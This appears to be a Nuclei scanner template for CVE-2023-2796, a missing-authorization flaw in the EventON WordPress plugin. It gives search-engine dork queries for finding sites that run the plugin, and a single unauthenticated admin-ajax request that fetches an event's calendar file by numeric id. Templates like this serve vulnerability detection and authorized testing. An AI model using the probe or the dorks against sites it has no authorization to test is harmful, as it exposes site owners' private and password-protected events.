Description
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
id: CVE-2023-2796
info:
name: EventON <= 2.1 - Missing Authorization
author: randomrobbie
severity: medium
description: |
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
impact: |
Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
remediation: Fixed in version 2.1.2
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
- https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
- https://nvd.nist.gov/vuln/detail/CVE-2023-2796
- http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
- https://github.com/nullfuzz-pentest/shodan-dorks
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-2796
cwe-id: CWE-862
epss-score: 0.42674
epss-percentile: 0.98642
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: myeventon
product: eventon
framework: wordpress
shodan-query:
- 'vuln:CVE-2023-2796'
- http.html:/wp-content/plugins/eventon-lite/
- http.html:/wp-content/plugins/eventon/
fofa-query:
- "wp-content/plugins/eventon/"
- body=/wp-content/plugins/eventon/
- body=/wp-content/plugins/eventon-lite/
publicwww-query:
- /wp-content/plugins/eventon/
- /wp-content/plugins/eventon-lite/
google-query: inurl:"/wp-content/plugins/eventon/"
tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN:VCALENDAR"
- "END:VCALENDAR"
condition: and
- type: word
part: header
words:
- "text/Calendar"
- type: status
status:
- 200
# digest: 4a0a00473045022100f321e56c2676e0c2b923d0f869fc2d58821e3d2c0ff3885cbda1cec5cb7001be02200259c5f018ce0bf0067a0d95d08b89867a0f8fb1c3832f9399d52eb132cd7cb8:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.